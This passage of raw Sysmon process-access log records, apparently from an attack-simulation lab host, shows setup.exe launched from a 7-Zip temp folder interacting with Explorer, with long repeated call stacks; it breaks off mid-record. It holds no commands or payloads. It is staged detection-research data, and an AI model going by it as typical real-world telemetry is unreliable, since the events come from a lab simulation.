13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows